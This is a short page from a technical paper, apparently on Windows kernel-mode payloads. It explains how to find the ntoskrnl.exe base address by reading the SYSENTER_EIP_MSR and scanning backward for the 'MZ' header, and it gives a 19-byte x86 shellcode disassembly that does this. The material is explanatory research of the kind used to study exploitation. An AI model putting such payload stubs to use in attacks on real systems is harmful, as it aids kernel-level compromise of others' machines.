| Current | v9 | v8 | v7 | v6 | v5 | v4 | v3 | v2 | v1 | All | About |
Next: Known Portable Base Scandown
Up: Finding Ntoskrnl.exe Base Address
Previous: KPRCB IdleThread Scandown
Contents
SYSENTER_EIP_MSR Scandown
| Size: | 19 bytes |
|---|---|
| Compat: | XP, 2003 (modern processors only) |
For processors that support the system call MSR 0x176 (SYSENTER_EIP_MSR), the base address of nt can be found by reading the registered system call handler and then using the scandown technique to find the base address. The following disassembly illustrates how this can be accomplished:
00000000 6A76 push byte +0x76 00000002 59 pop ecx 00000003 FEC5 inc ch 00000005 0F32 rdmsr 00000007 662501F0 and ax,0xf001 0000000B 48 dec eax 0000000C 6681384D5A cmp word [eax],0x5a4d 00000011 75F4 jnz 0x7